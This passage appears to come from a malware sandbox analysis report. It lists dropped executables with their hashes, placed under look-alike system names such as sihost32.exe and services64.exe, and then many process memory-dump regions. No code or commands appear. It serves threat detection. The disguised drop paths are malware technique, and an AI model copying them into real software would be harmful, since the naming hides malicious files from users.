SHA1 495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256 646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512 cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
\Users\Admin\AppData\Local\Temp\Server32.exe
MD5 7190f3a53c0e5247c2b7ece197acddea
SHA1 495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256 646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512 cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5 a48e4ecd100871e98f3b6128f9b37187
SHA1 8adf645a05d8ede551aadaaf51a37a47071497b9
SHA256 b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
SHA512 bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
-
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5 a48e4ecd100871e98f3b6128f9b37187
SHA1 8adf645a05d8ede551aadaaf51a37a47071497b9
SHA256 b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
SHA512 bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
-
\Users\Admin\services32.exe
MD5 55f246c4f670bddc2e1c6fab66fb9af8
SHA1 b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA256 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512 c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
\Users\Admin\services32.exe
MD5 55f246c4f670bddc2e1c6fab66fb9af8
SHA1 b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA256 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512 c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
\Windows\System32\Microsoft\Libs\sihost64.exe
MD5 ab0e8cd9d9374369b972868842a74471
SHA1 d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
SHA256 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
SHA512 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
\Windows\System32\services64.exe
MD5 f87ec0d92f1e1c57e281c3b7207264a4
SHA1 452ee705af24c36bb2235fc969dd122ede448e7b
SHA256 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA512 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
memory/540-117-0x0000000000000000-mapping.dmp
-
memory/584-124-0x0000000000000000-mapping.dmp
-
memory/816-130-0x000000001B1C4000-0x000000001B1C6000-memory.dmp
Filesize 8KB
-
memory/816-128-0x00000000001D0000-0x00000000003F2000-memory.dmp
Filesize 2.1MB
-
memory/816-132-0x000000001B1C7000-0x000000001B1C8000-memory.dmp
Filesize 4KB
-
memory/816-131-0x000000001B1C6000-0x000000001B1C7000-memory.dmp
Filesize 4KB
-
memory/816-129-0x000000001B1C2000-0x000000001B1C4000-memory.dmp
Filesize 8KB
-
memory/816-77-0x00000000010A0000-0x00000000010A1000-memory.dmp
Filesize 4KB
-
memory/816-74-0x00000000013A0000-0x00000000013A1000-memory.dmp
Filesize 4KB
-
memory/816-69-0x0000000000000000-mapping.dmp
-
memory/816-119-0x000000001B460000-0x000000001B67E000-memory.dmp
Filesize 2.1MB
-
memory/984-177-0x00000000027F0000-0x00000000027F2000-memory.dmp
Filesize 8KB
-
memory/984-175-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/984-171-0x0000000000000000-mapping.dmp
-
memory/984-178-0x00000000027F2000-0x00000000027F4000-memory.dmp
Filesize 8KB
-
memory/984-179-0x00000000027F4000-0x00000000027F7000-memory.dmp
Filesize 12KB
-
memory/984-180-0x000000001B8C0000-0x000000001BBBF000-memory.dmp
Filesize 3.0MB
-
memory/984-181-0x00000000027FB000-0x000000000281A000-memory.dmp
Filesize 124KB
-
memory/1048-197-0x0000000000000000-mapping.dmp
-
memory/1064-57-0x0000000000C80000-0x0000000000C81000-memory.dmp
Filesize 4KB
-
memory/1064-59-0x0000000005490000-0x0000000005491000-memory.dmp
Filesize 4KB
-
memory/1064-54-0x0000000076A81000-0x0000000076A83000-memory.dmp
Filesize 8KB
-
memory/1068-190-0x000000001ACF7000-0x000000001ACF8000-memory.dmp
Filesize 4KB
-
memory/1068-188-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
Filesize 8KB
-
memory/1068-187-0x000000001ACF2000-0x000000001ACF4000-memory.dmp
Filesize 8KB
-
memory/1068-121-0x0000000000000000-mapping.dmp
-
memory/1068-189-0x000000001ACF6000-0x000000001ACF7000-memory.dmp
Filesize 4KB
-
memory/1068-185-0x00000000003D0000-0x00000000003D3000-memory.dmp
Filesize 12KB
-
memory/1068-184-0x0000000000060000-0x0000000000067000-memory.dmp
Filesize 28KB
-
memory/1072-72-0x0000000000400000-0x0000000000EAE000-memory.dmp
Filesize 10.7MB
-
memory/1072-70-0x0000000000401000-0x0000000000403000-memory.dmp
Filesize 8KB
-
memory/1072-65-0x0000000000000000-mapping.dmp
-
memory/1112-218-0x00000000025B0000-0x00000000025B2000-memory.dmp
Filesize 8KB
-
memory/1112-205-0x0000000000000000-mapping.dmp
-
memory/1112-220-0x00000000025B2000-0x00000000025B4000-memory.dmp
Filesize 8KB
-
memory/1112-219-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1112-222-0x00000000025B4000-0x00000000025B7000-memory.dmp
Filesize 12KB
-
memory/1112-231-0x000000001B880000-0x000000001BB7F000-memory.dmp
Filesize 3.0MB
-
memory/1112-233-0x00000000025BB000-0x00000000025DA000-memory.dmp
Filesize 124KB
-
memory/1164-113-0x0000000000000000-mapping.dmp
-
memory/1312-126-0x0000000000000000-mapping.dmp
-
memory/1416-107-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1416-108-0x0000000002660000-0x0000000002662000-memory.dmp
Filesize 8KB
-
memory/1416-159-0x000000001ACD6000-0x000000001ACD7000-memory.dmp
Filesize 4KB
-
memory/1416-104-0x0000000000000000-mapping.dmp
-
memory/1416-157-0x000000001ACD2000-0x000000001ACD4000-memory.dmp
Filesize 8KB
-
memory/1416-111-0x000000000266B000-0x000000000268A000-memory.dmp
Filesize 124KB
-
memory/1416-162-0x000000001ACD7000-0x000000001ACD8000-memory.dmp
Filesize 4KB
-
memory/1416-110-0x0000000002664000-0x0000000002667000-memory.dmp
Filesize 12KB
-
memory/1416-158-0x000000001ACD4000-0x000000001ACD6000-memory.dmp
Filesize 8KB
-
memory/1416-109-0x0000000002662000-0x0000000002664000-memory.dmp
Filesize 8KB
-
memory/1476-169-0x0000000000000000-mapping.dmp
-
memory/1580-144-0x00000000028AB000-0x00000000028CA000-memory.dmp
Filesize 124KB
-
memory/1580-136-0x0000000000000000-mapping.dmp
-
memory/1580-140-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1580-143-0x00000000028A2000-0x00000000028A4000-memory.dmp
Filesize 8KB
-
memory/1580-142-0x00000000028A0000-0x00000000028A2000-memory.dmp
Filesize 8KB
-
memory/1580-141-0x00000000028A4000-0x00000000028A7000-memory.dmp
Filesize 12KB
-
memory/1652-139-0x000000000273B000-0x000000000275A000-memory.dmp
Filesize 124KB
-
memory/1652-122-0x0000000000000000-mapping.dmp
-
memory/1652-134-0x0000000002732000-0x0000000002734000-memory.dmp
Filesize 8KB
-
memory/1652-127-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1652-135-0x0000000002734000-0x0000000002737000-memory.dmp
Filesize 12KB
-
memory/1652-133-0x0000000002730000-0x0000000002732000-memory.dmp
Filesize 8KB
-
memory/1696-100-0x0000000002510000-0x0000000002512000-memory.dmp
Filesize 8KB
-
memory/1696-103-0x000000000251B000-0x000000000253A000-memory.dmp
Filesize 124KB
-
memory/1696-101-0x0000000002512000-0x0000000002514000-memory.dmp
Filesize 8KB
-
memory/1696-102-0x0000000002514000-0x0000000002517000-memory.dmp
Filesize 12KB
-
memory/1696-95-0x0000000000000000-mapping.dmp
-
memory/1696-96-0x000007FEFC271000-0x000007FEFC273000-memory.dmp
Filesize 8KB
-
memory/1696-98-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1732-97-0x0000000000000000-mapping.dmp
-
memory/1748-80-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize 128KB
-
memory/1748-81-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize 128KB
-
memory/1748-83-0x0000000000418D32-mapping.dmp
-
memory/1748-79-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize 128KB
-
memory/1748-78-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize 128KB
-
memory/1748-85-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize 128KB
-
memory/1748-148-0x0000000000000000-mapping.dmp
-
memory/1748-87-0x00000000012F0000-0x00000000012F1000-memory.dmp
Filesize 4KB
-
memory/1748-82-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize 128KB
-
memory/1748-151-0x0000000000400000-0x0000000000EAE000-memory.dmp
Filesize 10.7MB
-
memory/1752-94-0x0000000000000000-mapping.dmp
-
memory/1808-235-0x00000000000E0000-0x0000000000100000-memory.dmp
Filesize 128KB
-
memory/1808-234-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-227-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-236-0x00000000001D0000-0x00000000001F0000-memory.dmp
Filesize 128KB
-
memory/1808-237-0x0000000000390000-0x00000000003B0000-memory.dmp
Filesize 128KB
-
memory/1808-224-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-232-0x000000014030F3F8-mapping.dmp
-
memory/1808-221-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-228-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-202-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-203-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-204-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-229-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-206-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-217-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-208-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-212-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1808-230-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/1872-238-0x0000000000350000-0x0000000000353000-memory.dmp
Filesize 12KB
-
memory/1872-243-0x000000001AD84000-0x000000001AD86000-memory.dmp
Filesize 8KB
-
memory/1872-242-0x000000001AD82000-0x000000001AD84000-memory.dmp
Filesize 8KB
-
memory/1872-241-0x0000000000060000-0x0000000000066000-memory.dmp
Filesize 24KB
-
memory/1884-165-0x0000000002824000-0x0000000002827000-memory.dmp
Filesize 12KB
-
memory/1884-163-0x0000000002820000-0x0000000002822000-memory.dmp
Filesize 8KB
-
memory/1884-155-0x0000000000000000-mapping.dmp
-
memory/1884-166-0x0000000002822000-0x0000000002824000-memory.dmp
Filesize 8KB
-
memory/1884-164-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1884-176-0x000000000282B000-0x000000000284A000-memory.dmp
Filesize 124KB
-
memory/1912-216-0x0000000001DC0000-0x0000000001DC2000-memory.dmp
Filesize 8KB
-
memory/1912-201-0x000000001B7E0000-0x000000001BADF000-memory.dmp
Filesize 3.0MB
-
memory/1912-223-0x0000000001DC2000-0x0000000001DC4000-memory.dmp
Filesize 8KB
-
memory/1912-199-0x000007FEEE800000-0x000007FEEF35D000-memory.dmp
Filesize 11.4MB
-
memory/1912-225-0x0000000001DC4000-0x0000000001DC7000-memory.dmp
Filesize 12KB
-
memory/1912-226-0x0000000001DCB000-0x0000000001DEA000-memory.dmp
Filesize 124KB
-
memory/1912-194-0x0000000000000000-mapping.dmp
-
memory/1924-62-0x0000000000000000-mapping.dmp
-
memory/1936-146-0x0000000000000000-mapping.dmp
-
memory/1948-154-0x0000000000000000-mapping.dmp
-
memory/1956-93-0x000000001AB96000-0x000000001AB97000-memory.dmp
Filesize 4KB
-
memory/1956-211-0x000000001B246000-0x000000001B247000-memory.dmp
Filesize 4KB
-
memory/1956-209-0x000000001B244000-0x000000001B246000-memory.dmp
Filesize 8KB
-
memory/1956-207-0x000000001B242000-0x000000001B244000-memory.dmp
Filesize 8KB
-
memory/1956-213-0x000000001B247000-0x000000001B248000-memory.dmp
Filesize 4KB
-
memory/1956-92-0x000000001AB94000-0x000000001AB96000-memory.dmp
Filesize 8KB
-
memory/1956-99-0x000000001AB97000-0x000000001AB98000-memory.dmp
Filesize 4KB
-
memory/1956-90-0x0000000000060000-0x000000000006F000-memory.dmp
Filesize 60KB
-
memory/1956-91-0x000000001AB92000-0x000000001AB94000-memory.dmp
Filesize 8KB
-
memory/1956-88-0x0000000001C40000-0x0000000001C4C000-memory.dmp
Filesize 48KB
-
memory/1976-193-0x0000000000000000-mapping.dmp